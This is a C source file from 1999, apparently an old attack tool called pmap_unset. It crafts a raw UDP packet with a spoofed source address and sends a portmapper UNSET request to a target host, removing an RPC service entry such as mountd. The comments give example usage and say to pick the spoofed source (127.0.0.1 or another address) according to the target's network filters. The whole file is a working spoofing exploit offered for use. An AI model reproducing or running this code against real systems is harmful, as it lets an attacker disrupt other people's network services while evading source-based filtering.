
/*
 * pmap_unset v1.0 
 * 
 * Martin Rosa <mrosa@pgci.ca>
 * 
 * Example usage:
 * pmap_unset 127.0.0.1 1.1.1.1 100005 1
 *
 * This would remove mountd (100005) entry from portmapper's list.
 *
 * Instead of 127.0.0.1, you could also use 1.1.1.1.  It depends on filters
 * installed on your target's network.
 *
 * Notes:
 * arnudp v0.01 has been used as skeleton, Arny <cs6171@scitsc.wlv.ac.uk>
 *
 */

#include<sys/types.h>
#include<sys/socket.h>
#include<netinet/in_systm.h>
#include<netinet/in.h>
#include<netinet/ip.h>
#include<netinet/udp.h>
#include<errno.h>
#include<string.h>
#include<netdb.h>
#include<arpa/inet.h>
#include<stdio.h>

static char rcsid[]="$Id: pmap_unset.c,v 1.1 1999/01/09 02:53:38 root Exp $";

main(int argc, char *argv[])
{
int fd, x=1;
struct sockaddr sa;
struct sockaddr_in *sin;
struct hostent *he;
u_char gram[84]=
        {
        /* IP Header */
        0x45,   0x00,   0x54,   0x00,
        0x00,   0x26,   0x00,   0x00,
        0x36,   0x11,   0x00,   0x00,
        0xCE,   0xE7,   0xD2,   0x02,
        0xCE,   0xE7,   0xD2,   0x02,

        /* UDP Header */
        0x03,   0x52,   0x00,   0x6f,
        0x00,   0x40,   0x00,   0x00,

        /* Data */
        0x37,   0x00,   0x00,   0x00,
        0x00,   0x00,   0x00,   0x00,
        0x00,   0x00,   0x00,   0x02,
        0x00,   0x01,   0x86,   0xA0,
        0x00,   0x00,   0x00,   0x02,
        0x00,   0x00,   0x00,   0x02,
        0x00,   0x00,   0x00,   0x00,
        0x00,   0x00,   0x00,   0x00,
        0x00,   0x00,   0x00,   0x00,
        0x00,   0x00,   0x00,   0x00,
        0x00,   0x00,   0x00,   0x00,
        0x00,   0x00,   0x00,   0x00,
        0x00,   0x00,   0x00,   0x00,
        0x00,   0x00,   0x00,   0x00
        };

if (argc != 5) {
  fprintf(stderr, "usage: %s [src ip] [dst ip] [prognum] [versnum]\n", *argv);
  exit(-1);
  };

if ((he = gethostbyname(argv[1])) == NULL) {
  fprintf(stderr, "Can't resolve source hostname\n");
  exit(-1);
  };
bcopy(*(he->h_addr_list), (gram+12), 4);

if ((he = gethostbyname(argv[2])) == NULL) {
  fprintf(stderr, "Can't resolve destination hostname\n");
  exit(1);
  };
bcopy(*(he->h_addr_list), (gram+16), 4);

*(u_long *) (gram + 68) = htonl((u_long) atoi(argv[3]));
*(u_long *) (gram + 72) = htonl((u_long) atoi(argv[4]));

sin = (struct sockaddr_in *) &sa;
sin->sin_family = AF_INET;
bcopy(*(he->h_addr_list), &(sin->sin_addr), sizeof(struct in_addr));

if ((fd = socket(AF_INET, SOCK_RAW, IPPROTO_RAW)) == -1) {
  perror("socket");
  exit(-1);
  };

#ifdef IP_HDRINCL
if (setsockopt(fd,IPPROTO_IP,IP_HDRINCL,(char*)&x,sizeof(x)) < 0) {
  perror("setsockopt IP_HDRINCL");
  exit(-1);
  };
#else
fprintf(stderr, "IP_HDRINCL not present.\n");
exit(-1);
#endif

if ((sendto(fd, &gram, sizeof(gram), 0, (struct sockaddr *) sin, sizeof(struct sockaddr))) == -1) {
  perror("sendto");
  exit(-1);
  };
}
